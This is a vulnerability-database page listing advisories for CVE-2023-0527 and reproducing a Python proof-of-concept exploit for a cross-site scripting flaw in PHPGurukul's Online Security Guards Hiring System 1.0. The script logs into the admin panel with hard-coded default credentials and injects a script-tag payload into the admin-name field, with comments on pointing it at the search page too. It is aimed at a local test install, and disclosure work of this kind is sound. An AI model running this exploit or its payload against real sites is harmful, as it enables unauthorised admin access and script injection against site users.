Vulners
Lucene search
Online Security Guards Hiring System 1.0 - Reflected XSS
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Online Security Guards Hiring System 1.0 - Reflected XSS Exploit | 31 May 202300:00 | – | zdt |
 | CVE-2023-39552 | 4 Aug 202319:15 | – | attackerkb |
 | CVE-2023-0527 | 27 Jan 202314:34 | – | circl |
 | PHPGurukul Online Security Guards Hiring System 跨站脚本漏洞 | 27 Jan 202300:00 | – | cnnvd |
| 编号撤回 | 14 Jul 202300:00 | – | cnnvd |
 | CVE-2023-0527 | 27 Jan 202310:32 | – | cve |
 | CVE-2023-0527 PHPGurukul Online Security Guards Hiring System search-request.php cross site scripting | 27 Jan 202310:32 | – | cvelist |
 | EUVD-2023-12572 | 3 Oct 202520:07 | – | euvd |
 | Online Security Guards Hiring System - Cross-Site Scripting | 4 Jun 202603:48 | – | nuclei |
 | CVE-2023-0527 | 27 Jan 202311:15 | – | nvd |
10
#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS
#Google Dork : NA
#Date: 23-01-2023
#Exploit Author : AFFAN AHMED
#Vendor Homepage: https://phpgurukul.com
#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip
#Version: 1.0
#Tested on: Windows 11 + XAMPP + PYTHON-3.X
#CVE : CVE-2023-0527
#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT
# Below code check for both the parameter /admin-profile.php and in /search.php
#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md
import requests
import re
from colorama import Fore
print(Fore.YELLOW + "######################################################################" + Fore.RESET)
print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)
print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)
print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)
print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)
print(Fore.YELLOW +"######################################################################" + Fore.RESET)
print()
print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)
print()
# NAVIGATING TO ADMIN LOGIN PAGE
Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)
Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Referer': 'http://localhost/osghs/admin/login.php',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close',
'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document'
}
response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)
if response.status_code == 200:
location = re.findall(r'document.location =\'(.*?)\'',response.text)
if location:
print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)
print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )
else:
print(Fore.GREEN + "> document.location not found"+ Fore.RESET)
else:
print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)
# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE
# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER
Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE
# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD
# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""
payload = {
"adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE
"username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE
"mobilenumber": "8979555558",
"email": "[email protected]",
"submit": "",
}
# SENDING THE RESPONSE WITH POST REQUEST
response = requests.post(Website_url, headers=headers, data=payload)
print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)
# CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX
if response.status_code == 200:
scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)
print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET)
print(Fore.GREEN+">"+Fore.RESET,scripts)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 May 2023 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.13.5 - 6.1
CVSS 24
CVSS 33.5
EPSS0.08968